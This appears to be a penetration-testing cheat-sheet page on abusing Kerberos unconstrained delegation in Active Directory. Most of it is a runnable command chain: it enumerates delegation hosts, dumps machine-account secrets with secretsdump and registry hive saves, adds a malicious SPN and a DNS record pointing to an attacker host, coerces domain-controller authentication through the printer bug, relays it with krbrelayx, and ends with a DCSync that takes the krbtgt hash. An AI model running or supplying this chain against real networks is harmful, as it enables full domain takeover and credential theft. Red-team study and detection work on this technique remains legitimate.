Unconstrained
Enumerate:
PowerView3 > Get-DomainComputer -Unconstrained | select dnshostname,samaccountname,useraccountcontrol

Monitor for TGTs

Coerce authentication from a DC while monitoring for TGTs in the background on the owned unconstrained delegation system:
Cmd > .\Rubeus.exe monitor /targetuser:DC1$ /interval:5 /nowrap
Cmd > .\SpoolSample.exe dc1.megacorp.local srv01.megacorp.local
Use ticket_converter or ticketConverter.py to convert the TGT from .kirbi to .ccache (usable with impacket):
$ python ticket_converter.py dc1.kirbi dc1.ccache
$ KRB5CCNAME=`pwd`/dc1.ccache ...

"Relaying" Kerberos

A Note on Calculating Kerberos Keys for AD Accounts
From Zero Credential to Full Domain Compromise (Haboob Team).pdf
2MB
PDF

Printer Bug + DCSync

Requirements:
  • Owned computer account with unconstrained delegation enabled (SRV01).
  • Printer bug on a domain controller (DC01).
  • Permissions to add an SPN for the owned computer account and a new DNS record in AD.
1. Grab owned computer account password to calculate its Kerberos AES key. This is done automatically when extracting the password remotely with secretsdump.py, or it will be done later by krbrelayx.py when providing it the password in hex from local secretsdump.py output:
# Remotely
$ secretsdump.py MEGACORP/snovvcrash:'Passw0rd!'@SRV01.megacorp.local -ts
...
MEGACORP\SRV01$:aes256-cts-hmac-sha1-96:00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff
# Locally
Cmd > reg.exe save hklm\system system.hive
Cmd > reg.exe save hklm\security security.hive
$ secretsdump.py -system system.hive -security security.hive LOCAL
...
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:<PLAIN_PASSWORD_HEX>
2. Add a malicious SPN for the owned computer account with unconstrained delegation:
# Check (no modifications)
$ python addspn.py -u 'megacorp.local\SRV01#x27; -p :fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local -q DC01.megacorp.local
# Adding servicePrincipalName that doesn't match full hostname or samAccountName will fail
$ python addspn.py -u 'megacorp.local\SRV01#x27; -p :fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local DC01.megacorp.local
# But modifying msDS-AdditionalDnsHostName will succeed
$ python addspn.py -u 'megacorp.local\SRV01#x27; -p :fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local DC01.megacorp.local --additional
3. Add a DNS record pointing to the attacker's host:
$ python dnstool.py -u 'megacorp.local\SRV01#x27; -p :fc525c9683e8fe067095ba2ddc971889 -r evil.megacorp.local -d <ATTACKER_IP> --action add DC01.megacorp.local
4. Check that the record was added successfully (~ 3 minutes):
$ nslookup evil.megacorp.local <DC01_IP>
Server: 192.168.1.11
Address: 192.168.1.11#53
Name: evil.megacorp.local
Address: 10.10.13.37
5. Start krbrelayx.py providing AES key of the owned computer account or its plain password in hex with salt:
# In case secretsdump.py was used remotely
$ sudo python krbrelayx.py -aesKey 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff
# In case secretsdump.py was used locally
$ sudo python krbrelayx.py --krbhexpass <PLAIN_PASSWORD_HEX> --krbsalt MEGACORP.LOCALhostsrv01.megacorp.local
6. Coerce the authentication to attacker's host from DC01 by triggering printer bug:
$ python printerbug.py megacorp.local/'SRV01#x27;@DC01.megacorp.local -hashes :fc525c9683e8fe067095ba2ddc971889 evil.megacorp.local
7. Export extracted TGT and perform DCSync to get krbtgt hash (or any other privileged account hash):
$ export KRB5CCNAME=`pwd`/'[email protected][email protected]'
$ secretsdump.py DC01.megacorp.local -dc-ip <DC01_IP> -just-dc-user 'MEGACORP\krbtgt' -k -no-pass
8. Cleanup. Delete SPN and DNS record:
$ python addspn.py -u 'megacorp.local\SRV01#x27; -p :fc525c9683e8fe067095ba2ddc971889 -s HOST/evil.megacorp.local -r DC01.megacorp.local --additional
$ python dnstool.py -u 'megacorp.local\SRV01#x27; -p :fc525c9683e8fe067095ba2ddc971889 -r evil.megacorp.local -d <ATTACKER_IP> --action remove DC01.megacorp.local
# Check if the SPN was deleted successfully
$ windapsearch --dc 192.168.1.11 -d megacorp.local -u 'SRV01#x27; --hash fc525c9683e8fe067095ba2ddc971889 -m computers --attrs servicePrincipalName | grep SRV01
Other scenarios:
  • In this blogpost it is described how to perform the attack by abusing a service (user) account with unconstrained delegation enabled.
  • In this blogpost it is described how to perform the attack from Windows by extracting TGT with Inveigh.